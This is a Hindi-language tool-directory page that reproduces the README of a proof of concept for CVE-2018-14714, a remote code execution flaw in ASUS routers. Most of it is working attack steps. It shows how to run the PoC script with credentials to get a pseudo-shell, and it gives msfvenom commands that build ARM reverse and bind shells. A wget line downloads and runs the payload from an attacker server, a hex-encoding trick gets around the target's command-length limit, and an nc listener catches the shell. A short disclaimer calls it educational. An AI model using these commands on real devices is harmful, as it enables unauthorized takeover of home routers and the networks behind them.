Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-14714-RCE-exploit — ASUS wifi router RCE vulnerability | Kitploit
उपकरण/GitHubGitHub/bttea/cve-2018-14714-rce-exploit
IoT SecurityPayload GenerationExploitationWeb Application ExploitationWireless SecurityPenetration TestingLearning & EducationRemote Access Tool
GitHubbttea/cve-2018-14714-rce-exploit

CVE-2018-14714-RCE-exploit

ASUS wifi router RCE vulnerability

रिपॉजिटरी देखें
19210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-14714 RCE PoC

ASUS वाई-फाई राउटर RCE कमजोरी

यह PoC केवल सीखने और अनुसंधान के उद्देश्यों के लिए है। इसका उपयोग अवैध गतिविधियों के लिए न करें; किसी भी कानूनी परिणाम के लिए आप पूरी तरह से जिम्मेदार हैं।

  • यह इस PoC के आधार पर कोड संशोधनों के बाद किया गया एक परीक्षण है, क्योंकि मूल PoC में रूट अनुमतियों की कमी के कारण विफल हो सकता था।
    • https://github.com/sunn1day/CVE-2018-14714-POC

नीचे दिए गए प्रदर्शन में, परीक्षण किया गया उपकरण मॉडल ASUS RT-N18U है, फर्मवेयर संस्करण 3.0.0.4.378.9216 है, एक राउटर जो मैंने अपने विश्वविद्यालय के वर्षों के दौरान खरीदा था। अब यह मेरी परीक्षण मशीन है :)

कमजोरी PoC

  • शोषण की शर्तें

    • लॉगिन के लिए उपयोग किए जा सकने वाले खाते और पासवर्ड।
    • लक्ष्य को पैच की गई कमजोरियों वाले संस्करण में अपडेट नहीं किया गया है (संस्करण 3.0.0.4.384.32738 या 3.0.0.4.384.45149 से नीचे)।
  • आपको निर्भरताएँ स्थापित करने की आवश्यकता है:

    • $ python3 -m pip install requests

सीधे स्क्रिप्ट चलाएं उपयोग निर्देश प्राप्त करने के लिए। आप लक्ष्य में कमजोरी है या नहीं, यह सत्यापित करने के लिए नीचे दिए गए कमांड को चला सकते हैं।

$ python3 CVE-2018-14714-RCE_PoC.py <target> <user> <password>

शेल

आप हल्के रिवर्स शेल बाइनरी एक्जीक्यूटेबल उत्पन्न करने के लिए msfvenom कमांड का उपयोग कर सकते हैं। आप अपने कर्नेल वातावरण के अनुसार पैरामीटर को संशोधित कर सकते हैं। मेरे मामले में, यह armv7l है, और कमांड इस प्रकार है:

  • बाइंड शेल

    $ msfvenom -p linux/armle/shell_bind_tcp LPORT=4444 -f elf -o pwn.elf

  • रिवर्स शेल

    $ msfvenom -p linux/armle/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o pwn.elf

यदि आपके लक्ष्य डिवाइस में wget कमांड उपलब्ध है, तो पोर्ट 4444 पर सुनना शुरू करने के बाद, आप रिवर्स शेल प्राप्त करने के लिए स्यूडो-शेल में निम्नलिखित कमांड का उपयोग कर सकते हैं:

root@kitploit:~
$ python3 CVE-2018-14714-RCE_PoC.py admin admin shell
shell> cd /tmp && wget http://YourServer/pwn.elf -O pwn.elf && chmod +x ./pwn.elf && ./pwn.elf

यदि आपके लक्ष्य वातावरण में कोई अंतर्निहित दूरस्थ संसाधन एक्सेस कमांड नहीं है, तो कृपया पढ़ना जारी रखें।

प्रारंभिक कदम

उत्पन्न बाइनरी फ़ाइल को बाइनरी डेटा में बदलें।

root@kitploit:~
$ for i in `cat pwn.elf | xxd -p`;do echo -n $i;done

$ python3 -c 'a=input("binary data:");print("echo -ne \"",end="");print(*[f"\\x{a[i:i+2]}" for i in range(0,len(a),2)],sep="",end="");print("\"")'

कैसे निष्पादित करें?

लक्ष्य पर कमजोरी की उपस्थिति की पुष्टि करने के लिए, इंटरैक्टिव स्यूडो-शेल में प्रवेश करने के लिए जोड़े गए शेल पैरामीटर के साथ Python स्क्रिप्ट को फिर से चलाएं। कृपया ध्यान दें कि यदि कमांड कोई आउटपुट उत्पन्न नहीं करते हैं तो यह सामान्य है, क्योंकि stdout प्राप्त करने के लिए कोई स्थान नहीं है। हालांकि, sleep कमांड का उपयोग करके आप सत्यापित कर सकते हैं कि कमांड वास्तव में निष्पादित हुए हैं।

इसके अतिरिक्त, यह ध्यान रखना महत्वपूर्ण है कि परीक्षण के आधार पर, कमांड लाइन अधिकतम 1022 वर्णों की अनुमति देती है। आपको ऐसे कमांड बनाने की आवश्यकता है जो लंबाई में 1022 वर्णों से कम हों। इसलिए, आपको पेलोड को मैन्युअल रूप से विभाजित करना होगा और हमारे कमांड के सफलतापूर्वक चलने को सुनिश्चित करने के लिए इसे भागों में निष्पादित करना होगा।

  • इसके बाद, आइए एक वास्तविक रिवर्स शेल प्राप्त करें। आप निर्दिष्ट पोर्ट पर सुनना शुरू कर सकते हैं।

    $ nc -lvnp 4444

  • पेलोड इंजेक्ट करने के लिए स्यूडो-शेल प्राप्त करने हेतु Python PoC स्क्रिप्ट चलाएं।

    $ python3 CVE-2018-14714-RCE_PoC.py admin admin shell

  • अंत में, बस आपके द्वारा प्राप्त रिवर्स शेल का आनंद लेना शेष है :)

टूल डाउनलोड करें